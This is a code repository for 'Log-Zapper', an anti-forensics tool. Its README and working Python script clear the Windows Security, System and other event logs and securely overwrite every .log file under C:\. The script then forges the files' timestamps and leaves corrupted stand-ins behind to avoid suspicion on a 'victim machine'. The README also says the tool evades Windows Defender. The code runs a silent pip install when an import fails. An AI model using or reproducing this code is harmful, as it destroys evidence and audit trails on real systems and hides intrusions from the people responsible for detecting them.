/Linux/example.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Rug4lo/Log-Zapper/77f80afcba0ea28ba3f55cbef1191462e8577447/Linux/example.txt
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | 
2 | 
3 |
4 |
5 |
6 | 
7 |
8 |
9 | A high-quality log cleaner for pentesters and OPSEC teams.
10 |
11 |
12 |
13 | 
15 |
16 | 
18 |
19 | 
21 |
22 |
23 | # Table of Contents
24 |
25 | - [What is Log-Zapper?](#what-is-log-zapper)
26 | - [How It works](#how-it-works)
27 | - [Linux: Shapper](#linux-shapper)
28 | - [Usage](#linux-usage)
29 | - [Windows: Pyapper](#windows-pyapper)
30 | - [Usage](#windows-usage)
31 | - [Solaris (Coming soon...)]()
32 | - [BSD (Coming soon...]()
33 | - [Disclaimer](#disclaimer)
34 |
35 | # What is Log-Zapper?
36 |
37 | Log-Zapper is a tool designed to securely delete all logs. This tool is intended to be used at the end of an audit to avoid leaving traces. Additionally, it collects information from the file so that after deletion, it creates a copy identical in modification date and size, but with corrupted content, to avoid raising suspicions.
38 |
39 | # How It works
40 |
41 | First, we detect all files that may contain information about events and activities occurring on a system, as well as backups of these files.
42 |
43 | We use this detection along with the paths of the most common logs to delete them irretrievably.
44 |
45 | We have employed several techniques to ensure the logs are impossible to recover after deletion:
46 |
47 | - First, we erase all the information in the file. Then, we use the Gutmann method to overwrite the data on the hard disk multiple times with specific patterns to ensure the data is unrecoverable.
48 | - After the Gutmann method, we overwrite 70% of the required times with unusual patterns, specifically overwriting the file with 1s.
49 | - Finally, we overwrite 30% of the required times with zeros, making it harder to detect other overwritten patterns such as Gutmann's.
50 |
51 | Once the file has been securely overwrited and deleted, we create a fake corrupted file with the same size as the original and a modification date prior to the execution of our tool, to avoid being detected.
52 |
53 | # Linux: Shapper
54 |
55 | Shapper is the Log-zapper tool made in Bash for Linux Based Distributions.
56 | For user convenience the log-zapper is in a single file to be more agile when installing the program from the repository.
57 |
58 | ## Shapper Usage
59 |
60 | First clone the repository:
61 |
62 | git clone https://github.com/Rug4lo/Log-Zapper
63 | cd Log-Zapper/Linux/
64 |
65 | Move the tool in the machine you want to delete the logs, be sure you are root and give it privileges.
66 |
67 | chmod +x Shapper.sh
68 |
69 | Then execute the Tool.
70 |
71 | ./Shapper.sh
72 |
73 | Here the Linux Distro Based, in this case Debian Based, POC:
74 |
75 | 
76 |
77 |
78 | # Windows: Pyapper
79 |
80 | Pyapper is the Log-zapper tool made in Python for Windows OS.
81 | At the moment we only have a python script, as time goes by we will be adding more scripts written in C, powershell, cmd and other programming languages. It is worth mentioning that when running the program it will ask for administration privileges, otherwise it will only delete a few logs.
82 |
83 | _PD: Windows Defeder doesn't recognice it like a virus._
84 |
85 | ## Pyapper Usage
86 | Before installing the program, make sure that python3.9 or higher is installed on the victim machine. If not the program will not work correctly.
87 |
88 | After checking it, we clone the repository:
89 |
90 | git clone https://github.com/Rug4lo/Log-Zapper
91 | cd Log-Zapper/Windows/
92 |
93 | Move the tool in the machine/windows server you want to delete the logs. And execute the program with python
94 |
95 | python ./Pyapper.py
96 |
97 | Here the windows POC:
98 |
99 | 
100 |
101 |
102 | # Disclaimer
103 |
104 | Any actions and or activities related to **LogZapper** is solely your responsibility. The misuse of this toolkit can result in criminal charges brought against the persons in question. The contributors will not be held responsible in the event any criminal charges be brought against any individuals misusing this toolkit to break the law.
105 |
106 | This toolkit contains materials that can be potentially damaging or dangerous for some virtual private servers (VPS). Refer to the laws in your province/country before accessinng.
107 |
108 | This Tool is made for educational purposes only. Do not attempt to violate the law with anything contained here. If this is your intention, then Get the hell out of here!
109 |
--------------------------------------------------------------------------------
/Windows/Python/logzapper.py:
--------------------------------------------------------------------------------
1 | # Dependencies
2 | from colorama import Fore, init, Style, Back
3 | from pathlib import Path
4 | from pywintypes import Time
5 | from random import getrandbits
6 | from pywintypes import error as wintError
7 | import ctypes
8 | from ctypes.wintypes import BOOL, HANDLE, LPCWSTR, DWORD
9 | import datetime as dt
10 | from win32file import *
11 | from os import stat
12 | import os
13 | import time
14 |
15 | try:
16 | from pyuac import main_requires_admin
17 | except:
18 | from os import system as s;s("pip install pyuac")
19 |
20 | # Global variables
21 | format = "%d.%m.%Y %H:%M:%S"
22 |
23 | init()
24 | fileColor=Fore.YELLOW
25 | badFileColor=Fore.YELLOW+Back.RED
26 | goodst=Fore.GREEN
27 | warnst=Fore.RED
28 | reset=Style.RESET_ALL
29 |
30 | # Function to erase evtx logs
31 | def clearEvtx():
32 | # Main Variables
33 | wevtapi = ctypes.WinDLL('wevtapi.dll')
34 |
35 | EvtClearLog = wevtapi.EvtClearLog
36 | EvtClearLog.argtypes = [HANDLE, LPCWSTR, LPCWSTR, DWORD]
37 | EvtClearLog.restype = BOOL
38 |
39 | EvtOpenLog = wevtapi.EvtOpenLog
40 | EvtOpenLog.argtypes = [HANDLE, LPCWSTR, DWORD]
41 | EvtOpenLog.restype = HANDLE
42 |
43 | EvtClose = wevtapi.EvtClose
44 | EvtClose.argtypes = [HANDLE]
45 | EvtClose.restype = BOOL
46 |
47 | NULL = None
48 | EVT_HANDLE = HANDLE
49 | EVT_LOG_READ_ACCESS = 0x1
50 |
51 | for logFile in ["Application", "Security", "Windows Powershell", "System", "Setup"]:
52 | h_log = EvtOpenLog(NULL, logFile, EVT_LOG_READ_ACCESS)
53 | if not h_log:
54 | raise ctypes.WinError(ctypes.get_last_error(), f"Failed to open log: {logFile}")
55 |
56 | success = EvtClearLog(NULL, logFile, NULL, 0)
57 | if not success:
58 | error_code = ctypes.get_last_error()
59 | EvtClose(h_log)
60 | raise ctypes.WinError(error_code, f"Failed to clear log: {logFile}")
61 |
62 | if not EvtClose(h_log):
63 | raise ctypes.WinError(ctypes.get_last_error(), f"Failed to close log handle: {logFile}")
64 |
65 | print(f"{goodst}[+]{reset} The file: {fileColor+logFile+reset} has been successfully cleared")
66 |
67 |
68 | # Function to get headers of event logs
69 | def getEvtx():
70 | evtxPath= "C:\ProgramData\Microsoft\Event Viewer\ExternalLogs"
71 | evtxPathContent = Path(evtxPath).iterdir()
72 |
73 | if Path(evtxPath).is_dir():
74 | for file in evtxPathContent:
75 | yield str(file)
76 |
77 | # Verify is the file is used in any process
78 | def checkStatus(filename:str) -> bool:
79 | try:
80 | file_handle = CreateFile(filename, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, None)
81 | if file_handle:
82 | CloseHandle(file_handle)
83 | return False
84 | except wintError as e:
85 | if e.winerror == 32:
86 | return True
87 | return False
88 |
89 |
90 | # Function to get common log files
91 | def getLog():
92 | dir_path = os.path.dirname("C:\\")
93 |
94 | for root, _, files in os.walk(dir_path):
95 | if os.path.basename(root).lower() == 'logs':
96 | for file in files:
97 | yield(os.path.join(root, file))
98 | for file in files:
99 | if file.lower().endswith('.log'):
100 | yield(os.path.join(root, file))
101 |
102 | # Function to get timestamp of a file
103 | def getTS(filePath:str) -> tuple:
104 | stat = Path(filePath).stat()
105 |
106 | access_time = dt.datetime.fromtimestamp(stat.st_atime_ns / 1_000_000_000).strftime(format)
107 | modify_time = dt.datetime.fromtimestamp(stat.st_mtime_ns / 1_000_000_000).strftime(format)
108 | change_time = dt.datetime.fromtimestamp(stat.st_ctime_ns / 1_000_000_000).strftime(format)
109 |
110 | return change_time, modify_time, access_time
111 |
112 | # Function to set timestamp of a file
113 | def setTS(createTime:str, modifyTime:str, accessTime:str, filePath:str) -> None:
114 | fh = CreateFile(filePath, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, 0)
115 | try:
116 | createTime = Time(time.mktime(time.localtime(time.mktime(time.strptime(createTime,format))+0)))
117 | accessTime = Time(time.mktime(time.localtime(time.mktime(time.strptime(accessTime,format))+0)))
118 | modifyTime = Time(time.mktime(time.localtime(time.mktime(time.strptime(modifyTime,format))+0)))
119 | except RuntimeError as _:
120 | time.sleep(0.3)
121 | createTime = Time(time.mktime(time.localtime(time.mktime(time.strptime(createTime,format))+0)))
122 | accessTime = Time(time.mktime(time.localtime(time.mktime(time.strptime(accessTime,format))+0)))
123 | modifyTime = Time(time.mktime(time.localtime(time.mktime(time.strptime(modifyTime,format))+0)))
124 |
125 | SetFileTime(fh, createTime, accessTime, modifyTime)
126 | CloseHandle(fh)
127 |
128 | # Function to perform Gutmann method
129 | def gutmann(filePath:str) -> int:
130 | fileSize=(os.stat(filePath)).st_size
131 | rnd = lambda: os.urandom(3)
132 |
133 | data = [
134 | rnd(), rnd(), rnd(), rnd(),
135 | b'\x55', b'\xAA', b'\x92\x49\x24', b'\x49\x24\x92', b'\x24\x92\x49',
136 | b'\x00', b'\x11', b'\x22', b'\x33', b'\x44', b'\x55', b'\x66', b'\x77',
137 | b'\x88', b'\x99', b'\xAA', b'\xBB', b'\xCC', b'\xEE', b'\xFF',
138 | b'\x92\x49\x24', b'\x49\x24\x92', b'\x24\x92\x49',
139 | b'\x6D\x86\xD8', b'\xD6\xDB\x6D', b'\xDB\x6D\xB6',
140 | rnd(), rnd(), rnd(), rnd()
141 | ]
142 |
143 | with open(filePath, mode='r+b') as dummy_file:
144 | for loop in data:
145 | dummy_file.seek(0)
146 | if len(loop) == 1:
147 | dummy_file.write(loop * 65536)
148 | else:
149 | dummy_file.write(loop * 21845)
150 |
151 | return fileSize
152 |
153 | # Function to calculate the number of types of overwrites
154 | def overwriteCalulator(number:int):
155 | if number <= 0:
156 | return 0, 0
157 |
158 | overwrite1 = round(number * 0.70)
159 | overwrite0 = round(number * 0.30)
160 |
161 | return overwrite1,overwrite0
162 |
163 | # Function to erase correctly a file
164 | def removeFile(filePath: str, fileSize: int, overwriteN: int=9):
165 | nOverWrite1, nOverWrite0 = overwriteCalulator(overwriteN)
166 |
167 | # Overwrite with random patrons
168 | with open(filePath, "r+b") as dummy_file:
169 | for n in range(nOverWrite1):
170 | dummy_file.truncate(0)
171 | dummy_file.seek(0)
172 | dummy_file.write(bytearray(getrandbits(8) for _ in range(fileSize)))
173 |
174 | dummy_file.seek(0)
175 | dummy_file.write(bytearray(0 for _ in range(fileSize)))
176 |
177 | dummy_file.seek(0)
178 | dummy_file.write(bytearray(getrandbits(8) for _ in range(fileSize)))
179 |
180 | dummy_file.seek(0)
181 | dummy_file.write(bytearray(255 for _ in range(fileSize)))
182 |
183 | # Overwrite the file with zeros
184 | with open(filePath, "r+b") as dummy_file:
185 | for n in range(nOverWrite0):
186 | dummy_file.seek(0)
187 | dummy_file.write(bytearray(getrandbits(8) for _ in range(fileSize)))
188 |
189 | dummy_file.seek(0)
190 | dummy_file.write(bytearray(0 for _ in range(fileSize)))
191 |
192 | dummy_file.seek(0)
193 | dummy_file.write(bytearray(getrandbits(8) for _ in range(fileSize)))
194 |
195 | dummy_file.seek(0)
196 | dummy_file.write(bytearray(255 for _ in range(fileSize)))
197 |
198 | def joiner(logFile):
199 | try:
200 | if checkStatus(logFile):
201 | print(f"\n{warnst}[!]{reset} Skipping {badFileColor+logFile+reset} as it is use by another process")
202 | return
203 |
204 | at, mt, ct = getTS(logFile)
205 | fileSize = gutmann(logFile)
206 | removeFile(logFile, fileSize, overwriteN=9)
207 | setTS(at,mt,at,filePath=logFile)
208 |
209 | except PermissionError:
210 | print(f"\n{warnst}[!]{reset} Skipping {badFileColor+logFile+reset} due to insufficient permissions")
211 |
212 | @main_requires_admin
213 | # Main function with admin perms
214 | def main():
215 | clearEvtx()
216 |
217 | evtxLogs=getEvtx()
218 | for logFile in evtxLogs:
219 | joiner(logFile)
220 | print(f"{goodst}[+]{reset} The file: {fileColor+logFile+reset} has been successfully cleared")
221 | time.sleep(0.1)
222 | commonLogs=getLog()
223 | for logFile in commonLogs:
224 | joiner(logFile)
225 | print(f"{goodst}[+]{reset} The file: {fileColor+logFile+reset} has been successfully cleared")
226 | time.sleep(0.2)
227 |
228 | if __name__ == '__main__':
229 | main()
230 |
231 | print(f"{goodst}[++]{reset} Thanks for using the tool, enjoy your new free log windows")
232 | print("Made by Rug4lo & yoshl")
233 |
--------------------------------------------------------------------------------
/Windows/Python/requeriments.txt:
--------------------------------------------------------------------------------
1 | colorama==0.4.6
2 | pyuac==0.0.3
3 |
--------------------------------------------------------------------------------
/Windows/example.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Rug4lo/Log-Zapper/77f80afcba0ea28ba3f55cbef1191462e8577447/Windows/example.txt
--------------------------------------------------------------------------------
/images/PythonPOC.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Rug4lo/Log-Zapper/77f80afcba0ea28ba3f55cbef1191462e8577447/images/PythonPOC.gif
--------------------------------------------------------------------------------
/images/example.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Rug4lo/Log-Zapper/77f80afcba0ea28ba3f55cbef1191462e8577447/images/example.gif
--------------------------------------------------------------------------------
/images/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Rug4lo/Log-Zapper/77f80afcba0ea28ba3f55cbef1191462e8577447/images/logo.png
--------------------------------------------------------------------------------